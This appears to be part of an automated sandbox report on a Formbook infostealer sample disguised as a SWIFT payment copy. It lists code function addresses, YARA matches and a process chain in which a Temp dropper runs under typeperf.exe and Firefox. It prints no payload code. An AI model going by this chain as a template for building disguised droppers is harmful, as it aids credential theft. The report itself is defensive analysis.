            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5EA804_2_00B5EA80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C16BD74_2_00C16BD7
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1AB404_2_00C1AB40
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B50CF24_2_00B50CF2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C00CB54_2_00C00CB5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60C004_2_00B60C00
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B78DBF4_2_00B78DBF
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B5ADE04_2_00B5ADE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFCD1F4_2_00BFCD1F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6AD004_2_00B6AD00
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1EEDB4_2_00C1EEDB
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B72E904_2_00B72E90
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1CE934_2_00C1CE93
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1EE264_2_00C1EE26
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B60E594_2_00B60E59
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BDEFA04_2_00BDEFA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6CFE04_2_00B6CFE0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B52FC84_2_00B52FC8
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B80F304_2_00B80F30
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BA2F284_2_00BA2F28
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C02F304_2_00C02F30
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD4F404_2_00BD4F40
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0F0CC4_2_00C0F0CC
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1F0E04_2_00C1F0E0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C170E94_2_00C170E9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B670C04_2_00B670C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B6B1B04_2_00B6B1B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C2B16B4_2_00C2B16B
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4F1724_2_00B4F172
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9516C4_2_00B9516C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B652A04_2_00B652A0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C012ED4_2_00C012ED
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7B2C04_2_00B7B2C0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BA739A4_2_00BA739A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1132D4_2_00C1132D
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B4D34C4_2_00B4D34C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B514604_2_00B51460
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1F43F4_2_00C1F43F
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C295C34_2_00C295C3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFD5B04_2_00BFD5B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C175714_2_00C17571
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C116CC4_2_00C116CC
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BA56304_2_00BA5630
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1F7B04_2_00C1F7B0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B638E04_2_00B638E0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BCD8004_2_00BCD800
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BF59104_2_00BF5910
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B699504_2_00B69950
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7B9504_2_00B7B950
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C0DAC64_2_00C0DAC6
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BFDAAC4_2_00BFDAAC
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BA5AA04_2_00BA5AA0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C01AA34_2_00C01AA3
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C17A464_2_00C17A46
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1FA494_2_00C1FA49
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD3A6C4_2_00BD3A6C
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7FB804_2_00B7FB80
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B9DBF94_2_00B9DBF9
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD5BF04_2_00BD5BF0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1FB764_2_00C1FB76
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1FCF24_2_00C1FCF2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00BD9C324_2_00BD9C32
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B7FDC04_2_00B7FDC0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C11D5A4_2_00C11D5A
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C17D734_2_00C17D73
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B63D404_2_00B63D40
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B69EB04_2_00B69EB0
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B61F924_2_00B61F92
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B23FD24_2_00B23FD2
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00B23FD54_2_00B23FD5
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1FFB14_2_00C1FFB1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: 4_2_00C1FF094_2_00C1FF09
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_050365445_2_05036544
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_050345C25_2_050345C2
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_050345C45_2_050345C4
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_0503C8045_2_0503C804
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_050363245_2_05036324
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeCode function: 5_2_05050B345_2_05050B34
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BA3526_2_030BA352
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030C03E66_2_030C03E6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0300E3F06_2_0300E3F0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030A02746_2_030A0274
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030802C06_2_030802C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0309A1186_2_0309A118
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030881586_2_03088158
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030C01AA6_2_030C01AA
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B41A26_2_030B41A2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B81CC6_2_030B81CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030920006_2_03092000
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FF01006_2_02FF0100
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030247506_2_03024750
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030007706_2_03000770
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FFC7C06_2_02FFC7C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0301C6E06_2_0301C6E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030005356_2_03000535
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030C05916_2_030C0591
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030A44206_2_030A4420
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B24466_2_030B2446
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030AE4F66_2_030AE4F6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BAB406_2_030BAB40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FFEA806_2_02FFEA80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B6BD76_2_030B6BD7
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FE68B86_2_02FE68B8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030169626_2_03016962
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030029A06_2_030029A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030CA9A66_2_030CA9A6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0300A8406_2_0300A840
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030028406_2_03002840
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0302E8F06_2_0302E8F0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03042F286_2_03042F28
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03020F306_2_03020F30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030A2F306_2_030A2F30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03074F406_2_03074F40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0307EFA06_2_0307EFA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0300CFE06_2_0300CFE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BEE266_2_030BEE26
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FF2FC86_2_02FF2FC8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03000E596_2_03000E59
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03012E906_2_03012E90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BCE936_2_030BCE93
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BEEDB6_2_030BEEDB
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0300AD006_2_0300AD00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FF0CF26_2_02FF0CF2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0309CD1F6_2_0309CD1F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03018DBF6_2_03018DBF
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03000C006_2_03000C00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FFADE06_2_02FFADE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030A0CB56_2_030A0CB5
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B132D6_2_030B132D
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0304739A6_2_0304739A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030052A06_2_030052A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FED34C6_2_02FED34C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0301B2C06_2_0301B2C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030A12ED6_2_030A12ED
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030CB16B6_2_030CB16B
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0303516C6_2_0303516C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0300B1B06_2_0300B1B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FEF1726_2_02FEF172
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030070C06_2_030070C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030AF0CC6_2_030AF0CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B70E96_2_030B70E9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BF0E06_2_030BF0E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BF7B06_2_030BF7B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030456306_2_03045630
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B16CC6_2_030B16CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B75716_2_030B7571
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FF14606_2_02FF1460
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0309D5B06_2_0309D5B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030C95C36_2_030C95C3
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BF43F6_2_030BF43F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BFB766_2_030BFB76
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0301FB806_2_0301FB80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03075BF06_2_03075BF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0303DBF96_2_0303DBF9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BFA496_2_030BFA49
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B7A466_2_030B7A46
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03073A6C6_2_03073A6C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03045AA06_2_03045AA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0309DAAC6_2_0309DAAC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030A1AA36_2_030A1AA3
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030ADAC66_2_030ADAC6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030959106_2_03095910
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030099506_2_03009950
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0301B9506_2_0301B950
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0306D8006_2_0306D800
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030038E06_2_030038E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BFF096_2_030BFF09
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03001F926_2_03001F92
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BFFB16_2_030BFFB1
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC3FD56_2_02FC3FD5
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_02FC3FD26_2_02FC3FD2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03009EB06_2_03009EB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03003D406_2_03003D40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B1D5A6_2_030B1D5A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030B7D736_2_030B7D73
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_0301FDC06_2_0301FDC0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_03079C326_2_03079C32
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_030BFCF26_2_030BFCF2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006F18106_2_006F1810
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006ECA706_2_006ECA70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006ECC906_2_006ECC90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006EAD0E6_2_006EAD0E
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006EAD106_2_006EAD10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_006F2F506_2_006F2F50
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 6_2_007072806_2_00707280
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 03047E54 appears 111 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 0307F290 appears 105 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 0306EA12 appears 86 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 02FEB970 appears 280 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 03035130 appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: String function: 0040DFD0 appears 44 times
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: String function: 00401C30 appears 55 times
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: String function: 00BA7E54 appears 111 times
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: String function: 00B4B970 appears 280 times
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: String function: 00B95130 appears 58 times
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: String function: 00BCEA12 appears 86 times
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeCode function: String function: 00BDF290 appears 105 times
            Source: Payment_Copy_[SWIFT_COPY].exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 4.2.btpqr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.btpqr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3841079742.0000000004C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3839355049.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3839288746.0000000000B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1526993010.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1527458942.0000000003670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3837846912.00000000006E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1526694657.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/3@24/13
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004042C1
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,0_2_00402053
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeFile created: C:\Users\user\AppData\Local\Temp\nsw8D44.tmpJump to behavior
            Source: Payment_Copy_[SWIFT_COPY].exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Payment_Copy_[SWIFT_COPY].exeReversingLabs: Detection: 29%
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeFile read: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeProcess created: C:\Users\user\AppData\Local\Temp\btpqr.exe "C:\Users\user\AppData\Local\Temp\btpqr.exe"
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess created: C:\Users\user\AppData\Local\Temp\btpqr.exe C:\Users\user\AppData\Local\Temp\btpqr.exe
            Source: C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exeProcess created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exe
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exeProcess created: C:\Users\user\AppData\Local\Temp\btpqr.exe "C:\Users\user\AppData\Local\Temp\btpqr.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\btpqr.exeProcess created: C:\Users\user\AppData\Local\Temp\btpqr.exe C:\Users\user\AppData\Local\Temp\btpqr.exeJump to behavior
